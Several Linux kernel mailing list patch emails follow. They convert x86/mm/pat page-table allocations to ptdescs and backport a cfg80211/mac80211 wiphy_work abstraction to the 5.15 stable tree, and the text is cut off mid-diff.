In order to separately allocate ptdescs from pages, we need all allocation and free sites to use the appropriate functions. split_large_page() allocates a page to be used as a page table. This should be allocating a ptdesc, so convert it. Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com> --- arch/x86/mm/pat/set_memory.c | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c index 9f531c87531b..52226679d079 100644 --- a/arch/x86/mm/pat/set_memory.c +++ b/arch/x86/mm/pat/set_memory.c @@ -1119,9 +1119,10 @@ static void split_set_pte(struct cpa_data *cpa, pte_t *pte, unsigned long pfn, static int __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address, - struct page *base) + struct ptdesc *ptdesc) { unsigned long lpaddr, lpinc, ref_pfn, pfn, pfninc = 1; + struct page *base = ptdesc_page(ptdesc); pte_t *pbase = (pte_t *)page_address(base); unsigned int i, level; pgprot_t ref_prot; @@ -1226,18 +1227,18 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address, static int split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address) { - struct page *base; + struct ptdesc *ptdesc; if (!debug_pagealloc_enabled()) spin_unlock(&cpa_lock); - base = alloc_pages(GFP_KERNEL, 0); + ptdesc = pagetable_alloc(GFP_KERNEL, 0); if (!debug_pagealloc_enabled()) spin_lock(&cpa_lock); - if (!base) + if (!ptdesc) return -ENOMEM; - if (__split_large_page(cpa, kpte, address, base)) - __free_page(base); + if (__split_large_page(cpa, kpte, address, ptdesc)) + pagetable_free(ptdesc); return 0; } -- 2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:05 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
x86/mm/pat should be using ptdescs. One line has already been converted to pagetable_free(), while the allocation sites use get_free_pages(). This causes issues separately allocating ptdescs from struct page. These patches convert the allocation/free sites to use ptdescs. In the short term, this helps enable Matthew's work to allocate frozen pagetables[1]. And in the long term, this will help us cleanly split ptdesc allocations from struct page. The pgd_list should also be using ptdescs (for 32bit in this file). This can be done in a different patchset since there's other users of pgd_list that still need to be converted. [1] https://lore.kernel.org/linux-mm/20251113140448.1814860-1-willy@infradead.org/ [2] https://lore.kernel.org/linux-mm/20251020001652.2116669-1-willy@infradead.org/ ------ I've also tested this on a tree that separately allocates ptdescs. That didn't find any lingering alloc/free issues. Based on current mm-new. v3: - Move comment regarding 32-bit conversions into the cover letter - Correct the handling for the pagetable_alloc() error path Vishal Moola (Oracle) (3): x86/mm/pat: Convert pte code to use ptdescs x86/mm/pat: Convert pmd code to use ptdescs x86/mm/pat: Convert split_large_page() to use ptdescs arch/x86/mm/pat/set_memory.c | 56 +++++++++++++++++++++--------------- 1 file changed, 33 insertions(+), 23 deletions(-) -- 2.52.0
In order to separately allocate ptdescs from pages, we need all allocation and free sites to use the appropriate functions. Convert these pmd allocation/free sites to use ptdescs. populate_pgd() also allocates pagetables that may later be freed by try_to_free_pmd_page(), so allocate ptdescs there as well. Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com> --- arch/x86/mm/pat/set_memory.c | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c index f9f9d4ca8e71..9f531c87531b 100644 --- a/arch/x86/mm/pat/set_memory.c +++ b/arch/x86/mm/pat/set_memory.c @@ -1420,7 +1420,7 @@ static bool try_to_free_pmd_page(pmd_t *pmd) if (!pmd_none(pmd[i])) return false; - free_page((unsigned long)pmd); + pagetable_free(virt_to_ptdesc((void *)pmd)); return true; } @@ -1550,12 +1550,15 @@ static int alloc_pte_ptdesc(pmd_t *pmd) return 0; } -static int alloc_pmd_page(pud_t *pud) +static int alloc_pmd_ptdesc(pud_t *pud) { - pmd_t *pmd = (pmd_t *)get_zeroed_page(GFP_KERNEL); - if (!pmd) + pmd_t *pmd; + struct ptdesc *ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0); + + if (!ptdesc) return -1; + pmd = (pmd_t *) ptdesc_address(ptdesc); set_pud(pud, __pud(__pa(pmd) | _KERNPG_TABLE)); return 0; } @@ -1625,7 +1628,7 @@ static long populate_pmd(struct cpa_data *cpa, * We cannot use a 1G page so allocate a PMD page if needed. */ if (pud_none(*pud)) - if (alloc_pmd_page(pud)) + if (alloc_pmd_ptdesc(pud)) return -1; pmd = pmd_offset(pud, start); @@ -1681,7 +1684,7 @@ static int populate_pud(struct cpa_data *cpa, unsigned long start, p4d_t *p4d, * Need a PMD page? */ if (pud_none(*pud)) - if (alloc_pmd_page(pud)) + if (alloc_pmd_ptdesc(pud)) return -1; cur_pages = populate_pmd(cpa, start, pre_end, cur_pages, @@ -1718,7 +1721,7 @@ static int populate_pud(struct cpa_data *cpa, unsigned long start, p4d_t *p4d, pud = pud_offset(p4d, start); if (pud_none(*pud)) - if (alloc_pmd_page(pud)) + if (alloc_pmd_ptdesc(pud)) return -1; tmp = populate_pmd(cpa, start, end, cpa->numpages - cur_pages, @@ -1742,14 +1745,16 @@ static int populate_pgd(struct cpa_data *cpa, unsigned long addr) p4d_t *p4d; pgd_t *pgd_entry; long ret; + struct ptdesc *ptdesc; pgd_entry = cpa->pgd + pgd_index(addr); if (pgd_none(*pgd_entry)) { - p4d = (p4d_t *)get_zeroed_page(GFP_KERNEL); - if (!p4d) + ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0); + if (!ptdesc) return -1; + p4d = (p4d_t *) ptdesc_address(ptdesc); set_pgd(pgd_entry, __pgd(__pa(p4d) | _KERNPG_TABLE)); } @@ -1758,10 +1763,11 @@ static int populate_pgd(struct cpa_data *cpa, unsigned long addr) */ p4d = p4d_offset(pgd_entry, addr); if (p4d_none(*p4d)) { - pud = (pud_t *)get_zeroed_page(GFP_KERNEL); - if (!pud) + ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0); + if (!ptdesc) return -1; + pud = (pud_t *) ptdesc_address(ptdesc); set_p4d(p4d, __p4d(__pa(pud) | _KERNPG_TABLE)); } -- 2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:04 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH 5.15.y 1/3] wifi: cfg80211: add a work abstraction with special semantics
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit a3ee4dc84c4e9d14cb34dad095fd678127aca5b6 ] Add a work abstraction at the cfg80211 level that will always hold the wiphy_lock() for any work executed and therefore also can be canceled safely (without waiting) while holding that. This improves on what we do now as with the new wiphy works we don't have to worry about locking while cancelling them safely. Also, don't let such works run while the device is suspended, since they'll likely need to interact with the device. Flush them before suspend though. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- include/net/cfg80211.h | 95 ++++++++++++++++++++++++++++++-- net/wireless/core.c | 121 +++++++++++++++++++++++++++++++++++++++++ net/wireless/core.h | 7 +++ net/wireless/sysfs.c | 8 ++- 4 files changed, 226 insertions(+), 5 deletions(-) diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h index 66a75723f559..392576342661 100644 --- a/include/net/cfg80211.h +++ b/include/net/cfg80211.h @@ -5301,12 +5301,17 @@ struct cfg80211_cqm_config; * wiphy_lock - lock the wiphy * @wiphy: the wiphy to lock * - * This is mostly exposed so it can be done around registering and - * unregistering netdevs that aren't created through cfg80211 calls, - * since that requires locking in cfg80211 when the notifiers is - * called, but that cannot differentiate which way it's called. + * This is needed around registering and unregistering netdevs that + * aren't created through cfg80211 calls, since that requires locking + * in cfg80211 when the notifiers is called, but that cannot + * differentiate which way it's called. + * + * It can also be used by drivers for their own purposes. * * When cfg80211 ops are called, the wiphy is already locked. + * + * Note that this makes sure that no workers that have been queued + * with wiphy_queue_work() are running. */ static inline void wiphy_lock(struct wiphy *wiphy) __acquires(&wiphy->mtx) @@ -5326,6 +5331,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy) mutex_unlock(&wiphy->mtx); } +struct wiphy_work; +typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *); + +struct wiphy_work { + struct list_head entry; + wiphy_work_func_t func; +}; + +static inline void wiphy_work_init(struct wiphy_work *work, + wiphy_work_func_t func) +{ + INIT_LIST_HEAD(&work->entry); + work->func = func; +} + +/** + * wiphy_work_queue - queue work for the wiphy + * @wiphy: the wiphy to queue for + * @work: the work item + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work); + +/** + * wiphy_work_cancel - cancel previously queued work + * @wiphy: the wiphy, for debug purposes + * @work: the work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). + */ +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work); + +struct wiphy_delayed_work { + struct wiphy_work work; + struct wiphy *wiphy; + struct timer_list timer; +}; + +void wiphy_delayed_work_timer(struct timer_list *t); + +static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork, + wiphy_work_func_t func) +{ + timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0); + wiphy_work_init(&dwork->work, func); +} + +/** + * wiphy_delayed_work_queue - queue delayed work for the wiphy + * @wiphy: the wiphy to queue for + * @dwork: the delayable worker + * @delay: number of jiffies to wait before queueing + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay); + +/** + * wiphy_delayed_work_cancel - cancel previously queued delayed work + * @wiphy: the wiphy, for debug purposes + * @dwork: the delayed work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). + */ +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork); + /** * struct wireless_dev - wireless device state * diff --git a/net/wireless/core.c b/net/wireless/core.c index d51d27ff3729..788ca1055d6a 100644 --- a/net/wireless/core.c +++ b/net/wireless/core.c @@ -410,6 +410,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work) rtnl_unlock(); } +static void cfg80211_wiphy_work(struct work_struct *work) +{ + struct cfg80211_registered_device *rdev; + struct wiphy_work *wk; + + rdev = container_of(work, struct cfg80211_registered_device, wiphy_work); + + wiphy_lock(&rdev->wiphy); + if (rdev->suspended) + goto out; + + spin_lock_irq(&rdev->wiphy_work_lock); + wk = list_first_entry_or_null(&rdev->wiphy_work_list, + struct wiphy_work, entry); + if (wk) { + list_del_init(&wk->entry); + if (!list_empty(&rdev->wiphy_work_list)) + schedule_work(work); + spin_unlock_irq(&rdev->wiphy_work_lock); + + wk->func(&rdev->wiphy, wk); + } else { + spin_unlock_irq(&rdev->wiphy_work_lock); + } +out: + wiphy_unlock(&rdev->wiphy); +} + /* exported functions */ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, @@ -535,6 +563,9 @@ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, return NULL; } + INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work); + INIT_LIST_HEAD(&rdev->wiphy_work_list); + spin_lock_init(&rdev->wiphy_work_lock); INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work); INIT_WORK(&rdev->conn_work, cfg80211_conn_work); INIT_WORK(&rdev->event_work, cfg80211_event_work); @@ -1002,6 +1033,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy) } EXPORT_SYMBOL(wiphy_rfkill_start_polling); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev) +{ + unsigned int runaway_limit = 100; + unsigned long flags; + + lockdep_assert_held(&rdev->wiphy.mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + while (!list_empty(&rdev->wiphy_work_list)) { + struct wiphy_work *wk; + + wk = list_first_entry(&rdev->wiphy_work_list, + struct wiphy_work, entry); + list_del_init(&wk->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + wk->func(&rdev->wiphy, wk); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (WARN_ON(--runaway_limit == 0)) + INIT_LIST_HEAD(&rdev->wiphy_work_list); + } + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} + void wiphy_unregister(struct wiphy *wiphy) { struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); @@ -1040,9 +1096,14 @@ void wiphy_unregister(struct wiphy *wiphy) cfg80211_rdev_list_generation++; device_del(&rdev->wiphy.dev); + /* surely nothing is reachable now, clean up work */ + cfg80211_process_wiphy_works(rdev); wiphy_unlock(&rdev->wiphy); rtnl_unlock(); + /* this has nothing to do now but make sure it's gone */ + cancel_work_sync(&rdev->wiphy_work); + flush_work(&rdev->scan_done_wk); cancel_work_sync(&rdev->conn_work); flush_work(&rdev->event_work); @@ -1522,6 +1583,66 @@ static struct pernet_operations cfg80211_pernet_ops = { .exit = cfg80211_pernet_exit, }; +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (list_empty(&work->entry)) + list_add_tail(&work->entry, &rdev->wiphy_work_list); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + schedule_work(&rdev->wiphy_work); +} +EXPORT_SYMBOL_GPL(wiphy_work_queue); + +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + lockdep_assert_held(&wiphy->mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (!list_empty(&work->entry)) + list_del_init(&work->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} +EXPORT_SYMBOL_GPL(wiphy_work_cancel); + +void wiphy_delayed_work_timer(struct timer_list *t) +{ + struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer); + + wiphy_work_queue(dwork->wiphy, &dwork->work); +} +EXPORT_SYMBOL(wiphy_delayed_work_timer); + +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay) +{ + if (!delay) { + wiphy_work_queue(wiphy, &dwork->work); + return; + } + + dwork->wiphy = wiphy; + mod_timer(&dwork->timer, jiffies + delay); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue); + +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork) +{ + lockdep_assert_held(&wiphy->mtx); + + del_timer_sync(&dwork->timer); + wiphy_work_cancel(wiphy, &dwork->work); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel); + static int __init cfg80211_init(void) { int err; diff --git a/net/wireless/core.h b/net/wireless/core.h index 1720abf36f92..18d30f6fa7ca 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -103,6 +103,12 @@ struct cfg80211_registered_device { /* lock for all wdev lists */ spinlock_t mgmt_registrations_lock; + struct work_struct wiphy_work; + struct list_head wiphy_work_list; + /* protects the list above */ + spinlock_t wiphy_work_lock; + bool suspended; + /* must be last because of the way we do wiphy_priv(), * and it should at least be aligned to NETDEV_ALIGN */ struct wiphy wiphy __aligned(NETDEV_ALIGN); @@ -457,6 +463,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev, struct net_device *dev, enum nl80211_iftype ntype, struct vif_params *params); void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev); void cfg80211_process_wdev_events(struct wireless_dev *wdev); bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range, diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c index 0c3f05c9be27..4d3b65803010 100644 --- a/net/wireless/sysfs.c +++ b/net/wireless/sysfs.c @@ -5,7 +5,7 @@ * * Copyright 2005-2006 Jiri Benc <jbenc@suse.cz> * Copyright 2006 Johannes Berg <johannes@sipsolutions.net> - * Copyright (C) 2020-2021 Intel Corporation + * Copyright (C) 2020-2021, 2023 Intel Corporation */ #include <linux/device.h> @@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev) cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); } + cfg80211_process_wiphy_works(rdev); if (rdev->ops->suspend) ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config); if (ret == 1) { /* Driver refuse to configure wowlan */ cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); + cfg80211_process_wiphy_works(rdev); ret = rdev_suspend(rdev, NULL); } + if (ret == 0) + rdev->suspended = true; } wiphy_unlock(&rdev->wiphy); rtnl_unlock(); @@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev) wiphy_lock(&rdev->wiphy); if (rdev->wiphy.registered && rdev->ops->resume) ret = rdev_resume(rdev); + rdev->suspended = false; + schedule_work(&rdev->wiphy_work); wiphy_unlock(&rdev->wiphy); if (ret) -- 2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 16114496d684a3df4ce09f7c6b7557a8b2922795 ] We'll need this later to convert other works that might be cancelled from here, so convert this one first. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ibss.c | 8 ++++---- net/mac80211/ieee80211_i.h | 2 +- net/mac80211/iface.c | 10 +++++----- net/mac80211/mesh.c | 10 +++++----- net/mac80211/mesh_hwmp.c | 6 +++--- net/mac80211/mlme.c | 6 +++--- net/mac80211/ocb.c | 6 +++--- net/mac80211/rx.c | 2 +- net/mac80211/scan.c | 2 +- net/mac80211/status.c | 5 +++-- net/mac80211/util.c | 2 +- 11 files changed, 30 insertions(+), 29 deletions(-) diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c index 48e0260f3424..ce927c16a915 100644 --- a/net/mac80211/ibss.c +++ b/net/mac80211/ibss.c @@ -746,7 +746,7 @@ static void ieee80211_csa_connection_drop_work(struct work_struct *work) skb_queue_purge(&sdata->skb_queue); /* trigger a scan to find another IBSS network to join */ - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); sdata_unlock(sdata); } @@ -1245,7 +1245,7 @@ void ieee80211_ibss_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifibss->incomplete_lock); list_add(&sta->list, &ifibss->incomplete_stations); spin_unlock(&ifibss->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static void ieee80211_ibss_sta_expire(struct ieee80211_sub_if_data *sdata) @@ -1726,7 +1726,7 @@ static void ieee80211_ibss_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.ibss.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_ibss_setup_sdata(struct ieee80211_sub_if_data *sdata) @@ -1861,7 +1861,7 @@ int ieee80211_ibss_join(struct ieee80211_sub_if_data *sdata, sdata->needed_rx_chains = local->rx_chains; sdata->control_port_over_nl80211 = params->control_port_over_nl80211; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); return 0; } diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 3b5350cfc0ee..8d6616f646e7 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -966,7 +966,7 @@ struct ieee80211_sub_if_data { /* used to reconfigure hardware SM PS */ struct work_struct recalc_smps; - struct work_struct work; + struct wiphy_work work; struct sk_buff_head skb_queue; struct sk_buff_head status_queue; diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c index e437bcadf4a2..eb7de2d455e1 100644 --- a/net/mac80211/iface.c +++ b/net/mac80211/iface.c @@ -43,7 +43,7 @@ * by either the RTNL, the iflist_mtx or RCU. */ -static void ieee80211_iface_work(struct work_struct *work); +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work); bool __ieee80211_recalc_txpower(struct ieee80211_sub_if_data *sdata) { @@ -539,7 +539,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do RCU_INIT_POINTER(local->p2p_sdata, NULL); fallthrough; default: - cancel_work_sync(&sdata->work); + wiphy_work_cancel(sdata->local->hw.wiphy, &sdata->work); /* * When we get here, the interface is marked down. * Free the remaining keys, if there are any @@ -1005,7 +1005,7 @@ int ieee80211_add_virtual_monitor(struct ieee80211_local *local) skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); return 0; } @@ -1487,7 +1487,7 @@ static void ieee80211_iface_process_status(struct ieee80211_sub_if_data *sdata, } } -static void ieee80211_iface_work(struct work_struct *work) +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work) { struct ieee80211_sub_if_data *sdata = container_of(work, struct ieee80211_sub_if_data, work); @@ -1590,7 +1590,7 @@ static void ieee80211_setup_sdata(struct ieee80211_sub_if_data *sdata, skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); INIT_WORK(&sdata->recalc_smps, ieee80211_recalc_smps_work); INIT_WORK(&sdata->csa_finalize_work, ieee80211_csa_finalize_work); INIT_WORK(&sdata->color_change_finalize_work, ieee80211_color_change_finalize_work); diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c index 6202157f467b..2f888cbe6e2b 100644 --- a/net/mac80211/mesh.c +++ b/net/mac80211/mesh.c @@ -44,7 +44,7 @@ static void ieee80211_mesh_housekeeping_timer(struct timer_list *t) set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } /** @@ -642,7 +642,7 @@ static void ieee80211_mesh_path_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mesh.mesh_path_timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mesh_path_root_timer(struct timer_list *t) @@ -653,7 +653,7 @@ static void ieee80211_mesh_path_root_timer(struct timer_list *t) set_bit(MESH_WORK_ROOT, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_mesh_root_setup(struct ieee80211_if_mesh *ifmsh) @@ -1018,7 +1018,7 @@ void ieee80211_mbss_info_change_notify(struct ieee80211_sub_if_data *sdata, for_each_set_bit(bit, &bits, sizeof(changed) * BITS_PER_BYTE) set_bit(bit, &ifmsh->mbss_changed); set_bit(MESH_WORK_MBSS_CHANGED, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) @@ -1043,7 +1043,7 @@ int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) ifmsh->sync_offset_clockdrift_max = 0; set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); ieee80211_mesh_root_setup(ifmsh); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); sdata->vif.bss_conf.ht_operation_mode = ifmsh->mshcfg.ht_opmode; sdata->vif.bss_conf.enable_beacon = true; diff --git a/net/mac80211/mesh_hwmp.c b/net/mac80211/mesh_hwmp.c index 8bf238afb544..a3522b21803f 100644 --- a/net/mac80211/mesh_hwmp.c +++ b/net/mac80211/mesh_hwmp.c @@ -1,7 +1,7 @@ // SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2008, 2009 open80211s Ltd. - * Copyright (C) 2019, 2021 Intel Corporation + * Copyright (C) 2019, 2021-2023 Intel Corporation * Author: Luis Carlos Cobo <luisca@cozybit.com> */ @@ -1020,14 +1020,14 @@ static void mesh_queue_preq(struct mesh_path *mpath, u8 flags) spin_unlock_bh(&ifmsh->mesh_preq_queue_lock); if (time_after(jiffies, ifmsh->last_preq + min_preq_int_jiff(sdata))) - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); else if (time_before(jiffies, ifmsh->last_preq)) { /* avoid long wait if did not send preqs for a long time * and jiffies wrapped around */ ifmsh->last_preq = jiffies - min_preq_int_jiff(sdata) - 1; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } else mod_timer(&ifmsh->mesh_path_timer, ifmsh->last_preq + min_preq_int_jiff(sdata)); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 6e86a23c647d..d147760e8389 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -2509,7 +2509,7 @@ void ieee80211_sta_tx_notify(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.probe_send_count = 0; else sdata->u.mgd.nullfunc_failed = true; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mlme_send_probe_req(struct ieee80211_sub_if_data *sdata, @@ -4415,7 +4415,7 @@ static void ieee80211_sta_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mgd.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_sta_connection_lost(struct ieee80211_sub_if_data *sdata, @@ -4559,7 +4559,7 @@ void ieee80211_mgd_conn_tx_status(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.status_acked = acked; sdata->u.mgd.status_received = true; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void ieee80211_sta_work(struct ieee80211_sub_if_data *sdata) diff --git a/net/mac80211/ocb.c b/net/mac80211/ocb.c index 7c1a735b9eee..9713e53f11b1 100644 --- a/net/mac80211/ocb.c +++ b/net/mac80211/ocb.c @@ -80,7 +80,7 @@ void ieee80211_ocb_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifocb->incomplete_lock); list_add(&sta->list, &ifocb->incomplete_stations); spin_unlock(&ifocb->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static struct sta_info *ieee80211_ocb_finish_sta(struct sta_info *sta) @@ -156,7 +156,7 @@ static void ieee80211_ocb_housekeeping_timer(struct timer_list *t) set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void ieee80211_ocb_setup_sdata(struct ieee80211_sub_if_data *sdata) @@ -196,7 +196,7 @@ int ieee80211_ocb_join(struct ieee80211_sub_if_data *sdata, ifocb->joined = true; set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); netif_carrier_on(sdata->dev); return 0; diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index 1c1660160787..15933e9abc9b 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -219,7 +219,7 @@ static void __ieee80211_queue_skb_to_iface(struct ieee80211_sub_if_data *sdata, struct sk_buff *skb) { skb_queue_tail(&sdata->skb_queue, skb); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); if (sta) sta->rx_stats.packets++; } diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c index 3bf3dd4bafa5..fd77c707e65c 100644 --- a/net/mac80211/scan.c +++ b/net/mac80211/scan.c @@ -498,7 +498,7 @@ static void __ieee80211_scan_completed(struct ieee80211_hw *hw, bool aborted) */ list_for_each_entry_rcu(sdata, &local->interfaces, list) { if (ieee80211_sdata_running(sdata)) - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } if (was_scanning) diff --git a/net/mac80211/status.c b/net/mac80211/status.c index f6f63a0b1b72..017ea2d2f36f 100644 --- a/net/mac80211/status.c +++ b/net/mac80211/status.c @@ -5,6 +5,7 